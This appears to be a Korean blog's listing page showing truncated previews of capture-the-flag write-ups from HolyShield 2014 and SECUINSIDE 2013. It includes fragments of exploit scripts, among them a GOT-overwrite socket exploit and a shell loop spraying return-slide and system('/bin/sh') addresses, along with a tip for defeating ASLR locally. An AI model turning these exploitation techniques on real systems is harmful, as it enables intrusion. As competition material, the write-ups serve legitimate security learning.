본문 바로가기
반응형

blackcon160

[misc] 홀리쉴드 2014 magiceye writeup ======================================================================= 문제파일을 HxD로 열어보면 zip파일 시그니처가 들어있습니다. zip파일을 추출하여 안의 파일을 보면 다음과 같습니다. 압축파일 내부의 파일 중에서 봐야할 이미지는 “fd1f96373b509c826add83a11020ea8d - copied.BMP”, “fd1f96373b509c826add83a11020ea8d.BMP"입니다. 이 두 이미지는 같은 이미지같지만 hash를 보면 다른 것을 알 수 있습니다. fd1 = open( "fd1f96373b509c826add83a11020ea8d - copied.BMP", "rb" ) fd2 = open( "fd1f96.. 2014. 11. 25.
[exploit] 홀리쉴드 2014 kitty writeups =========================== tag : got overwrite, _dl_runtime_resolve import socket import struct import telnetlib host = "192.168.1.22" port = 1120 s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) s.connect( ( host, port ) ) raw_input( ' go > ' ) def until_recv( st ): buf = '' while st not in buf: buf += s.recv( 1024 ) return buf #### teach #### print until_recv( "select") s.send( '2\n' ).. 2014. 11. 25.
[exploit] 2013 SECUINSIDE movie_talk writeups 해당 바이너리는 로컬환경으로 주어지는 exploit문제입니다. 당시 서버 환경은 ASLR과 NX가 정용되어있는 Ubuntu 13.04버전이었어요!! 로컬에서 ulimit -s unlimited를 입력해주면 라이브러리 주소가 고정되니 참고하시길 !!! ^---^ #!/bin/sh# for RET slide # [ret]*100 [system][system][/bin/sh][/bin/sh]for i in $(seq 1 512); do export a$i="`python -c "print '\x42\x6c\x0b\x40'*100 + '\x10\x8f\x07\x40\x10\x8f\x07\x40' + '\xf4\x74\x17\x40\xf4\x74\x17\x40'"`"; done #!/usr/bin/env pyth.. 2014. 11. 19.
[exploit] 2013 SECUINSIDE reader writeups 아래는 바이너리 파일이고 간단하게 익스플로잇 코드만 올리겠습니다.;D #!/usr/bin/env python import struct p = lambda x: struct.pack( " 2014. 11. 17.